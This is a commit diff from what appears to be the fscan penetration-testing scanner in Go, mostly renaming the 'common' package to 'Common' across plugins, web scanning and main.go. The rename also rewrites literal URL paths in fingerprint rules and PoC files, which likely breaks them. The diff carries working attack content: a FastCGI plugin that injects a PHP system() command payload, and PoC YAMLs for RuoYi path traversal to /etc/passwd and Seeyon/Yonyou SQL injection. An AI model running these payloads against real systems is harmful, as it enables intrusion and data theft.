info.Url = fmt.Sprintf("https://%s", info.Host)
default:
host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
protocol := GetProtocol(host, common.Timeout)
protocol := GetProtocol(host, Common.Timeout)
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
}
} else {
if !strings.Contains(info.Url, "://") {
host := strings.Split(info.Url, "/")[0]
protocol := GetProtocol(host, common.Timeout)
protocol := GetProtocol(host, Common.Timeout)
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
}
}
@ -113,14 +113,14 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
if err != nil {
return err, "", CheckData
}
req.Header.Set("User-agent", common.UserAgent)
req.Header.Set("Accept", common.Accept)
req.Header.Set("User-agent", Common.UserAgent)
req.Header.Set("Accept", Common.Accept)
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
if common.Cookie != "" {
req.Header.Set("Cookie", common.Cookie)
if Common.Cookie != "" {
req.Header.Set("Cookie", Common.Cookie)
}
//if common.Pocinfo.Cookie != "" {
// req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
//if Common.Pocinfo.Cookie != "" {
// req.Header.Set("Cookie", "rememberMe=1;"+Common.Pocinfo.Cookie)
//} else {
// req.Header.Set("Cookie", "rememberMe=1")
//}
@ -162,7 +162,7 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
if reurl != "" {
result += fmt.Sprintf(" 跳转url: %s", reurl)
}
common.LogSuccess(result)
Common.LogSuccess(result)
}
if reurl != "" {
return nil, reurl, CheckData
@ -233,7 +233,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) {
return
}
socksconn, err := common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second)
socksconn, err := Common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second)
if err != nil {
return
}
@ -242,7 +242,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) {
if conn != nil {
defer func() {
if err := recover(); err != nil {
common.LogError(err)
Common.LogError(err)
}
}()
conn.Close()

22
Plugins/fcgiscan.go
View File

@ -6,8 +6,8 @@ import (
"encoding/binary"
"errors"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"io"
"strconv"
"strings"
@ -22,14 +22,14 @@ import (
// FcgiScan 执行FastCGI服务器漏洞扫描
func FcgiScan(info *Config.HostInfo) error {
// 如果设置了暴力破解模式则跳过
if common.IsBrute {
if Common.IsBrute {
return nil
}
// 设置目标URL路径
url := "/etc/issue"
if common.Path != "" {
url = common.Path
if Common.Path != "" {
url = Common.Path
}
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
@ -38,10 +38,10 @@ func FcgiScan(info *Config.HostInfo) error {
var cutLine = "-----ASDGTasdkk361363s-----\n" // 用于分割命令输出的标记
switch {
case common.Command == "read":
case Common.Command == "read":
reqParams = "" // 读取模式
case common.Command != "":
reqParams = fmt.Sprintf("<?php system('%s');die('%s');?>", common.Command, cutLine) // 自定义命令
case Common.Command != "":
reqParams = fmt.Sprintf("<?php system('%s');die('%s');?>", Common.Command, cutLine) // 自定义命令
default:
reqParams = fmt.Sprintf("<?php system('whoami');die('%s');?>", cutLine) // 默认执行whoami
}
@ -65,7 +65,7 @@ func FcgiScan(info *Config.HostInfo) error {
}
// 建立FastCGI连接
fcgi, err := New(addr, common.Timeout)
fcgi, err := New(addr, Common.Timeout)
defer func() {
if fcgi.rwc != nil {
fcgi.rwc.Close()
@ -97,7 +97,7 @@ func FcgiScan(info *Config.HostInfo) error {
result = fmt.Sprintf("[+] FastCGI漏洞确认 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, output)
}
common.LogSuccess(result)
Common.LogSuccess(result)
} else if strings.Contains(output, "File not found") ||
strings.Contains(output, "Content-type") ||
strings.Contains(output, "Status") {
@ -109,7 +109,7 @@ func FcgiScan(info *Config.HostInfo) error {
result = fmt.Sprintf("[*] FastCGI服务确认 %v:%v\n响应:\n%v",
info.Host, info.Ports, output)
}
common.LogSuccess(result)
Common.LogSuccess(result)
}
return nil
@ -187,7 +187,7 @@ type FCGIClient struct {
}
func New(addr string, timeout int64) (fcgi *FCGIClient, err error) {
conn, err := common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second)
fcgi = &FCGIClient{
rwc: conn,
keepAlive: false,

4
WebScan/InfoScan.go
View File

@ -3,8 +3,8 @@ package WebScan
import (
"crypto/md5"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan/info"
"github.com/shadow1ng/fscan/common"
"regexp"
)
@ -39,7 +39,7 @@ func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
if len(infoname) > 0 {
result := fmt.Sprintf("[+] InfoScan %-25v %s ", Url, infoname)
common.LogSuccess(result)
Common.LogSuccess(result)
return infoname
}
return []string{""}

24
WebScan/WebScan.go
View File

@ -3,9 +3,9 @@ package WebScan
import (
"embed"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"net/http"
"os"
"path/filepath"
@ -20,7 +20,7 @@ var AllPocs []*lib.Poc
func WebScan(info *Config.HostInfo) {
once.Do(initpoc)
var pocinfo = common.Pocinfo
var pocinfo = Common.Pocinfo
buf := strings.Split(info.Url, "/")
pocinfo.Target = strings.Join(buf[:3], "/")
@ -34,25 +34,25 @@ func WebScan(info *Config.HostInfo) {
}
}
func Execute(PocInfo common.PocInfo) {
func Execute(PocInfo Common.PocInfo) {
req, err := http.NewRequest("GET", PocInfo.Target, nil)
if err != nil {
errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err)
common.LogError(errlog)
Common.LogError(errlog)
return
}
req.Header.Set("User-agent", common.UserAgent)
req.Header.Set("Accept", common.Accept)
req.Header.Set("User-agent", Common.UserAgent)
req.Header.Set("Accept", Common.Accept)
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
if common.Cookie != "" {
req.Header.Set("Cookie", common.Cookie)
if Common.Cookie != "" {
req.Header.Set("Cookie", Common.Cookie)
}
pocs := filterPoc(PocInfo.PocName)
lib.CheckMultiPoc(req, pocs, common.PocNum)
lib.CheckMultiPoc(req, pocs, Common.PocNum)
}
func initpoc() {
if common.PocPath == "" {
if Common.PocPath == "" {
entries, err := Pocs.ReadDir("pocs")
if err != nil {
fmt.Printf("[-] init poc error: %v", err)
@ -67,8 +67,8 @@ func initpoc() {
}
}
} else {
fmt.Println("[+] load poc from " + common.PocPath)
err := filepath.Walk(common.PocPath,
fmt.Println("[+] load poc from " + Common.PocPath)
err := filepath.Walk(Common.PocPath,
func(path string, info os.FileInfo, err error) error {
if err != nil || info == nil {
return err

14
WebScan/info/rules.go → WebScan/info/Rules.go
View File

@ -72,7 +72,7 @@ var RuleDatas = []RuleData{
{"atmail-WebMail", "cookie", "(atmail6)"},
{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
{"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
{"致远OA", "code", "(/seeyon/Common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
{"discuz", "code", "(content=\"Discuz! X\")"},
{"Typecho", "code", "(Typecho</a>)"},
{"金蝶EAS", "code", "(easSessionId)"},
@ -88,10 +88,10 @@ var RuleDatas = []RuleData{
{"CISCO_EPC3925", "code", "(Docsis_system)"},
{"CISCO ASR", "code", "(CISCO ASR)"},
{"H3C ER3200", "code", "(ER3200系统管理)"},
{"万户oa", "code", "(/defaultroot/templates/template_system/common/css/|/defaultroot/scripts/|css/css_whir.css)"},
{"万户oa", "code", "(/defaultroot/templates/template_system/Common/css/|/defaultroot/scripts/|css/css_whir.css)"},
{"Spark_Master", "code", "(Spark Master at)"},
{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
{"蓝凌OA", "code", "(/scripts/jquery.landray.Common.js)"},
{"深信服ssl-vpn", "code", "(login_psw.csp)"},
{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
@ -229,14 +229,14 @@ var RuleDatas = []RuleData{
{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"},
{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/Common)"},
{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"},
{"weblogic", "headers", "(WebLogic)"},
{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/Common/)"},
{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.Common.js)"},
{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
@ -246,7 +246,7 @@ var RuleDatas = []RuleData{
{"用友NC", "code", "(Yonyou UAP|YONYOU NC|/Client/Uclient/UClient.dmg|logo/images/ufida_nc.png|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
{"JEECMS", "code", "(/r/cms/www/red/js/Common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
{"CMS", "code", "(Powered by .*CMS)"},
{"目录遍历", "code", "(Directory listing for /)"},
{"ATLASSIAN-Confluence", "code", "(com.atlassian.confluence)"},

16
WebScan/lib/check.go → WebScan/lib/Check.go
View File

@ -4,8 +4,8 @@ import (
"crypto/md5"
"fmt"
"github.com/google/cel-go/cel"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan/info"
"github.com/shadow1ng/fscan/common"
"math/rand"
"net/http"
"net/url"
@ -34,7 +34,7 @@ func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
isVul, _, name := executePoc(task.Req, task.Poc)
if isVul {
result := fmt.Sprintf("[+] PocScan %s %s %s", task.Req.URL, task.Poc.Name, name)
common.LogSuccess(result)
Common.LogSuccess(result)
}
wg.Done()
}
@ -82,7 +82,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
for _, item := range p.Set {
k, expression := item.Key, item.Value
if expression == "newReverse()" {
if !common.DnsLog {
if !Common.DnsLog {
return false, nil, ""
}
variableMap[k] = newReverse()
@ -240,7 +240,7 @@ func optimizeCookies(rawCookie string) (output string) {
}
func newReverse() *Reverse {
if !common.DnsLog {
if !Common.DnsLog {
return &Reverse{}
}
letters := "1234567890abcdefghijklmnopqrstuvwxyz"
@ -280,7 +280,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
look:
for j, item := range setsMap {
//shiro默认只跑10key
if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 {
if p.Name == "poc-yaml-shiro-key" && !Common.PocFull && j >= 10 {
if item[1] == "cbc" {
continue
} else {
@ -356,15 +356,15 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
if success {
if rule.Continue {
if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" {
common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
} else {
common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
}
continue
}
strMap = append(strMap, tmpMap...)
if i == len(p.Rules)-1 {
common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
//防止后续继续打印poc成功信息
return false, nil
}

18
WebScan/lib/client.go → WebScan/lib/Client.go
View File

@ -6,7 +6,7 @@ import (
"embed"
"errors"
"fmt"
"github.com/shadow1ng/fscan/common"
"github.com/shadow1ng/fscan/Common"
"golang.org/x/net/proxy"
"gopkg.in/yaml.v2"
"net"
@ -25,14 +25,14 @@ var (
)
func Inithttp() {
//common.Proxy = "http://127.0.0.1:8080"
if common.PocNum == 0 {
common.PocNum = 20
//Common.Proxy = "http://127.0.0.1:8080"
if Common.PocNum == 0 {
Common.PocNum = 20
}
if common.WebTimeout == 0 {
common.WebTimeout = 5
if Common.WebTimeout == 0 {
Common.WebTimeout = 5
}
err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
err := InitHttpClient(Common.PocNum, Common.Proxy, time.Duration(Common.WebTimeout)*time.Second)
if err != nil {
panic(err)
}
@ -56,8 +56,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
DisableKeepAlives: false,
}
if common.Socks5Proxy != "" {
dialSocksProxy, err := common.Socks5Dailer(dialer)
if Common.Socks5Proxy != "" {
dialSocksProxy, err := Common.Socks5Dailer(dialer)
if err != nil {
return err
}

6
WebScan/lib/eval.go → WebScan/lib/Eval.go
View File

@ -12,7 +12,7 @@ import (
"github.com/google/cel-go/common/types"
"github.com/google/cel-go/common/types/ref"
"github.com/google/cel-go/interpreter/functions"
"github.com/shadow1ng/fscan/common"
"github.com/shadow1ng/fscan/Common"
exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
"io"
"math/rand"
@ -563,7 +563,7 @@ func randomString(n int) string {
}
func reverseCheck(r *Reverse, timeout int64) bool {
if ceyeApi == "" || r.Domain == "" || !common.DnsLog {
if ceyeApi == "" || r.Domain == "" || !Common.DnsLog {
return false
}
time.Sleep(time.Second * time.Duration(timeout))
@ -627,7 +627,7 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
defer oResp.Body.Close()
resp, err := ParseResponse(oResp)
if err != nil {
common.LogError("[-] ParseResponse error: " + err.Error())
Common.LogError("[-] ParseResponse error: " + err.Error())
//return nil, err
}
return resp, err

0
WebScan/lib/shiro.go → WebScan/lib/Shiro.go
View File

4
WebScan/pocs/ruoyi-management-fileread.yml
View File

@ -2,12 +2,12 @@ name: poc-yaml-ruoyi-management-fileread
groups:
linux:
- method: GET
path: /common/download/resource?resource=/profile/../../../../etc/passwd
path: /Common/download/resource?resource=/profile/../../../../etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
windows:
- method: GET
path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:

2
WebScan/pocs/seeyon-a6-test-jsp-sql.yml
View File

@ -3,7 +3,7 @@ set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:

2
WebScan/pocs/yonyou-u8-oa-sqli.yml
View File

@ -3,7 +3,7 @@ set:
rand: randomInt(200000000, 220000000)
rules:
- method: GET
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))

2
common/config.go
View File

@ -1,4 +1,4 @@
package common
package Common
var version = "1.8.4"
var Userdict = map[string][]string{

2
common/flag.go
View File

@ -1,4 +1,4 @@
package common
package Common
import (
"flag"

2
common/log.go
View File

@ -1,4 +1,4 @@
package common
package Common
import (
"encoding/json"

2
common/proxy.go
View File

@ -1,4 +1,4 @@
package common
package Common
import (
"errors"

6
main.go
View File

@ -2,17 +2,17 @@ package main
import (
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/Plugins"
"github.com/shadow1ng/fscan/common"
"time"
)
func main() {
start := time.Now()
var Info Config.HostInfo
common.Flag(&Info)
common.Parse(&Info)
Common.Flag(&Info)
Common.Parse(&Info)
Plugins.Scan(Info)
fmt.Printf("[*] 扫描结束,耗时: %s\n", time.Since(start))
}